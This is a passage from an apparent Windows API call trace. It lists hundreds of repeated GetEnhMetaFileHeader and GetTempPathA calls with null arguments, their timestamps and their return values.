hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.092] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.093] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.180] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.180] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.181] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 